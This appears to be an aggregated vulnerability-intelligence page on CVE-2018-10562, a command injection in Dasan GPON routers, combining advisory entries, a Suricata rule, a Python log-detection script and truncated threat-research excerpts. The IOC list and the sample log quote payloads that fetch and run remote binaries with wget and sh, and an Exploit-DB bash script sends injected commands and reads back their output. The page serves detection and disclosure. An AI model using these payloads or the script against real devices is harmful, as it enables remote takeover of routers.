CVE-2018-10562
Published 2018-05-04
Priority: P196 · critical · 9.8 · CVSS 3.1
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Exploit · Ransomware · Initial access
CISA Known Exploited Vulnerability, due 2022-04-21
Exploited in the wild
EPSS: 99.95% (100.0th percentile)
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
Detection & IOCs (extracted from sources)
- command: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s/gpon80+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
- command: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s/gpon8080+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
- Exploit requests target the URI GponForm/diag_Form with POST parameters XWebPageName=diag, diag_action=ping, and shell metacharacters (backtick command injection) in the dest_host parameter.
- Attackers retrieve command output by revisiting /diag.html after injecting commands; monitor for GET requests to /diag.html following suspicious POST requests to GponForm/diag_Form.
- Exploit payload drops and executes wget-fetched binaries in /tmp (e.g., /tmp/gpon80, /tmp/gpon8080); monitor for file creation and shell execution in /tmp on GPON router firmware.
- CVE-2018-10562 is chained with CVE-2018-10561 (authentication bypass); detection should look for unauthenticated POST requests to GponForm/diag_Form.
- Omni/Mirai variant samples use XOR encryption table key 0xBAADF00D for config string encryption; use this key when decrypting captured botnet config tables.
- Okane campaign payload server briefly replaced with Cloudflare DNS IP 1.1.1.1 on June 13; monitor for botnet C2 traffic pivoting to 1.1.1.1 as a payload source.
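The detection logic in the bullets above, as an added example that is not code from any of the sources this page cites: a small Python scanner that runs over access-log lines, flags a diag_Form ping request whose dest_host carries shell metacharacters, and then correlates the follow-up GET /diag.html from the same source that retrieves the command output. It assumes a combined-log-format line with the POST body appended as a final quoted field (a constructed logging convention, since stock web servers do not log bodies), and the source IPs, timestamps and payload host in the sample lines are constructed as well. It generalizes the page's backtick case to any character outside the hostname/IP alphabet in dest_host.

```python
"""Detect CVE-2018-10562 exploitation attempts in web-server access logs.

Added example for this page, not code from any cited source. Log format
(CLF prefix + request line + status + size + quoted POST body) is a
constructed convention; adapt LOG_RE to whatever your proxy actually logs.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Constructed log format: client, ident, user, [timestamp], "request line",
# status, size, then the (possibly empty) request body as a final quoted field.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<body>[^"]*)"$'
)

# A legitimate ping target (hostname, IPv4, IPv6) uses only this alphabet.
HOST_OK_RE = re.compile(r'^[A-Za-z0-9.:\-]*$')
# Shell metacharacters that turn a ping target into a command (backtick and
# ';' are the two forms the page's sources describe).
SHELL_META = set('`;|&$(){}<>\n\r')


def parse_form(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body into a dict.

    Splits only on '&' so a ';' inside dest_host survives as evidence; older
    stdlib parse_qs versions also split on ';' and would hide the injection.
    """
    fields = {}
    for pair in body.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def is_suspicious_dest_host(value: str) -> bool:
    """True when the ping target carries shell metacharacters or anything
    outside the hostname/IP alphabet."""
    if any(ch in SHELL_META for ch in value):
        return True
    return HOST_OK_RE.match(value) is None


def analyze(log_text: str, window: timedelta = timedelta(seconds=60)) -> list:
    """Return alerts: one per suspicious diag_Form ping POST, plus one for a
    GET /diag.html from the same source within `window` (output retrieval).
    Prefix matching on the path keeps the '?images/' query string seen in the
    page's PoC in scope."""
    alerts = []
    pending = {}  # src IP -> timestamp of its last suspicious diag_Form POST
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scan
        src, method, path = m['src'], m['method'], m['path']
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        if method == 'POST' and path.startswith('/GponForm/diag_Form'):
            form = parse_form(m['body'])
            dest = form.get('dest_host', '')
            if form.get('diag_action') == 'ping' and is_suspicious_dest_host(dest):
                alerts.append({'kind': 'gpon_diag_command_injection',
                               'src': src, 'dest_host': dest, 'ts': ts})
                pending[src] = ts
        elif method == 'GET' and path.startswith('/diag.html'):
            last = pending.get(src)
            if last is not None and timedelta(0) <= ts - last <= window:
                alerts.append({'kind': 'gpon_diag_output_retrieval',
                               'src': src, 'dest_host': None, 'ts': ts})
                del pending[src]
    return alerts


# Constructed sample lines: one injection + retrieval pair from 203.0.113.7
# (documentation-range IP; payload host is a placeholder) and one benign
# ping from 192.0.2.5 that must not alert.
SAMPLE_LOG = """\
203.0.113.7 - - [04/May/2018:10:00:01 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 0 "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://203.0.113.250/gpon80+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0"
203.0.113.7 - - [04/May/2018:10:00:04 +0000] "GET /diag.html?images/ HTTP/1.1" 200 1423 "-"
192.0.2.5 - - [04/May/2018:10:05:10 +0000] "POST /GponForm/diag_Form HTTP/1.1" 200 0 "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=8.8.8.8&ipv=0"
192.0.2.5 - - [04/May/2018:10:05:13 +0000] "GET /diag.html HTTP/1.1" 200 1200 "-"
"""

if __name__ == '__main__':
    for a in analyze(SAMPLE_LOG):
        print(a['ts'].isoformat(), a['src'], a['kind'], a['dest_host'])
```

Running the block prints two alerts for 203.0.113.7 and none for the benign host. The retrieval alert is the higher-confidence signal: a diag.html fetch within seconds of a metacharacter-laden ping request is the page's described read-back step, whereas the POST alone may be a scanner that never returns for output.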
CVSS provenance
- nvd v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- nvd v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
- vulncheck: 9.8 CRITICAL
- cisa: 9.8 CRITICAL
CISA
Dasan GPON Routers Command Injection Vulnerability
cisa·2022-03-31·CVSS 9.8
CVE-2018-10562 [CRITICAL] CWE-78 Dasan GPON Routers Command Injection Vulnerability
Vulnerability: Dasan GPON Routers Command Injection Vulnerability
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10561, exploitation can allow an attacker to perform remote code execution.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-10562
Remediation Due Date: 2022-04-21
CISA
Dasan GPON Routers Authentication Bypass Vulnerability
cisa·2022-03-31·CVSS 9.8
CVE-2018-10561 [CRITICAL] CWE-287 Dasan GPON Routers Authentication Bypass Vulnerability
Vulnerability: Dasan GPON Routers Authentication Bypass Vulnerability
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-10561
Remediation Due Date: 2022-04-21
GHSA
GHSA-6x97-cqx6-mvmq: An issue was discovered on Dasan GPON home routers
ghsa_unreviewed·2022-05-13
CVE-2018-10562 [CRITICAL] CWE-78 GHSA-6x97-cqx6-mvmq: An issue was discovered on Dasan GPON home routers
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
VulnCheck
Dasan GPON Routers Authentication Bypass Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-10561 [CRITICAL] CWE-287 Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-10561; https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/; https://www.virusbulletin.com/virusbulletin/2019/12/vb2019-paper-absolutely-routed-why-routers-are-new-bul
VulnCheck
Dasan GPON Routers Command Injection Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-10562 [CRITICAL] CWE-78 Dasan GPON Routers Command Injection Vulnerability
Dasan GPON Routers Command Injection Vulnerability
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10561, exploitation can allow an attacker to perform remote code execution.
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/; https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_02B-3_Herwig_paper.pdf; https://www.trendmicro.com/en_us/research/19/e/new-mirai-variant-uses-multiple-exploits
Suricata
ET EXPLOIT HackingTrio UA (Hello, World)
suricata·2018-05-11
CVE-2018-10561 ET EXPLOIT HackingTrio UA (Hello, World)
ET EXPLOIT HackingTrio UA (Hello, World)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT HackingTrio UA (Hello, World)"; flow:established,to_server; http.method; content:"POST"; http.user_agent; content:"Hello, World"; fast_pattern; endswith; reference:cve,2018-10561; reference:cve,2018-10562; reference:url,github.com/f3d0x0/GPON; classtype:attempted-admin; sid:2025576; rev:4; metadata:attack_target IoT, created_at 2018_05_11, cve CVE_2018_10561, deployment Perimeter, performance_impact Low, signature_severity Major, tag GPON, updated_at 2020_09_16;)
Exploit-DB
GPON Routers - Authentication Bypass / Command Injection
exploitdb·2018-05-03
CVE-2018-10562 GPON Routers - Authentication Bypass / Command Injection
GPON Routers - Authentication Bypass / Command Injection
---
#!/bin/bash
echo "[+] Sending the Command... "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting...."
sleep 3
echo "[+] Retrieving the output...."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'
Nuclei
Dasan GPON Devices - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-10562 [CRITICAL] Dasan GPON Devices - Remote Code Execution
Dasan GPON Devices - Remote Code Execution
Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
Template:
id: CVE-2018-10562
info:
  name: Dasan GPON Devices - Remote Code Execution
  author: gy741
  severity: critical
  description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's q
Bleepingcomputer
New Aquabotv3 botnet malware targets Mitel command injection flaw
blogs_bleepingcomputer·2025-01-29·CVSS 7.2
CVE-2024-41710 [HIGH] New Aquabotv3 botnet malware targets Mitel command injection flaw
## New Aquabotv3 botnet malware targets Mitel command injection flaw
By Bill Toulas
A new variant of the Mirai-based botnet malware Aquabot has been observed actively exploiting CVE-2024-41710, a command injection vulnerability in Mitel SIP phones.
The activity was discovered by Akamai's Security Intelligence and Response Team (SIRT), who reports that this is the third variant of Aquabot that falls under their radar.
The malware family was introduced in 2023, and a second version that added persistence mechanisms was released later. The third variant, 'Aquabotv3,' introduced a system that detects termination signals and sends the info to the command-and-control (C2) server.
Akamai comments that Aquabotv3's mechanism to report back kill attempts is unusual for botnets and may have been
Fortinet
The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
blogs_fortinet·2024-06-25·CVSS 9.8
[CRITICAL] The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Growing Threat of Malware Concealed Behind Cloud Services
Sections: UNSTABLE Botnet; Condi DDoS Botnet; UDP Flooder and Process Checker; Skibidi; Conclusion; Fortinet Protections; IOCs (C2, URLs, Files)
By Cara Lin and Vincent Li | June 25, 2024
Affected Platforms: Linux Distributions
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Cybersecurity threats are increasingly leveraging cloud services to store, distribute, and establish command and control (C2) servers, such as VCRUMS stored on AWS or SYK Crypter distributed via DriveHQ. This shift in strategy presents significant challenges for detection and prevention, as cloud services provide scalability, anonymity, and resilience that traditional hostin
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan, Lei Xu, Ken Hsu, Zhibin Zhang
Published: January 22, 2021
Tags: Malware, Trend Reports, Vulnerabilities, DDoS, Exploits, IoT, Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concern
Trendmicro
Transforming IoT Monitoring Data into Threat Defense
blogs_trendmicro·2020-10-14
Transforming IoT Monitoring Data into Threat Defense
Cyber threats
## Transforming IoT Monitoring Data into Threat Defense
To protect its customers even better against cyber threats, Trend Micro uses the Indicators of Compromise collected from IoT attacks to improve its threat detection capability.
By: Shimamura Makoto, Oct 14, 2020
Original article by Shimamura Makoto, Senior Security Specialist
Trend Micro's 2020 midyear security report shows a 70 percent increase in attacks on devices and routers compared with the second half of 2019. This includes attacks on Internet of Things (IoT) systems, whose growing frequency is alarming. Trend Micro's security researchers monitor the trends in these attacks and examined
Trendmicro
Transforming IoT Monitoring Data into Threat Defense
blogs_trendmicro·2020-10-08
Transforming IoT Monitoring Data into Threat Defense
IoT
# Transforming IoT Monitoring Data into Threat Defense
In this article, we feature data gathered from our continuous monitoring of C&C servers of botnets such as Mirai and Bashlite. We also share how this data is used to bolster the protection of IoT devices.
By: Shimamura Makoto, 2020/10/08
In our midyear roundup report, we shared that in the first half of 2020, there was a 70% increase in inbound attacks on devices and routers compared with the second half of 2019. This data includes attacks on Internet of Things (IoT) systems, which remain alarming and prevalent.
With the aim of protecting customers effectively by continuously monitoring trends in IoT attacks, we examined Mirai and Bashlite (aka Qbot), two notorious IoT botnet malware types th
Trendmicro
Neko, Mirai and Bashlite Target Routers, Devices
blogs_trendmicro·2019-08-13
Neko, Mirai and Bashlite Target Routers, Devices
# Neko, Mirai and Bashlite Target Routers, Devices
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
By: Augusto Remillano II, Jakub Urbanec, Aug 13, 2019
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlis
Trendmicro
New Mirai Variant Uses Multiple Exploits
blogs_trendmicro·2019-05-23
New Mirai Variant Uses Multiple Exploits
Exploits & Vulnerabilities
# New Mirai Variant Uses Multiple Exploits
We discovered a new variant of Mirai that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities.
By: Augusto Remillano II, Jakub Urbanec, May 23, 2019
We discovered a new variant of Mirai (detected as Backdoor.Linux.MIRAI.VWIPT) that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities. However, this case stands out as the first to have used all 13 exploits together in a single campa
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
## ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II, 2019/01/25
Cybercriminals are exploiting a ThinkPHP vulnerability, one that was disclosed and patched in December 2018, for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks (DDoS). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Janua
Securelist
New trends in the world of IoT threats
blogs_securelist·2018-09-18
New trends in the world of IoT threats
Authors
Mikhail Kuzin
Yaroslav Shmelev
Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypot
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
CVE-2017-5638 [CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
## Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Ruchna Nigam
Published: September 9, 2018
Tags: Malware, Threat Research, Vulnerabilities, Apache Struts, BlackNurse, Botnet, CVE-2017-5638, CVE-2018-9866, Exploits, Gafgyt, IoT, Linux, Mirai, SonicWall RCE
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
- The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
- The new Gafgyt version targets a newly disclosed vulnerability affectin
Unit42
Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
blogs_unit42·2018-07-20·CVSS 9.8
[CRITICAL] Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.
In their newest evolution, samples also target the D-Link DSL-2750B OS Command Injection vulnerability, only a few weeks after the publication of its Metasploit module on the 25th of May (even though the vulnerability has been public knowledge since February of 2016).
While exploring sa
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Exploits & Vulnerabilities
## GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team, 2018/05/21
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of CVE-2
Qualys
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers | Qualys
blogs_qualys·2018-05-08
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers | Qualys
The cyber security news cycle is always active, so to help you stay in the loop here’s a selection of incidents that caught our attention over the past week or so involving, among others, Twitter, Cisco and GPON routers.
### Twitter picks a good day for password-change call
As “change your password” calls from vendors go, the one from Twitter last week ranks right up there, and not just because of the scope of users involved. As Jon Swartz pointed out in Barron’s, Twitter’s alert went out on Thursday, which happened to be World Password Day.
The social media juggernaut reached out to all of its 330 million users and advised them to take a moment, go to their account settings page and enter a new password. Twitter also suggested they enable Twitter’s two-step verification feature, a move
References:
- http://www.securityfocus.com/bid/107053
- https://www.exploit-db.com/exploits/44576/
- https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10562
Timeline
- 2018-05-04: Published
- 2022-03-31: Added to CISA KEV
- Exploited in the wild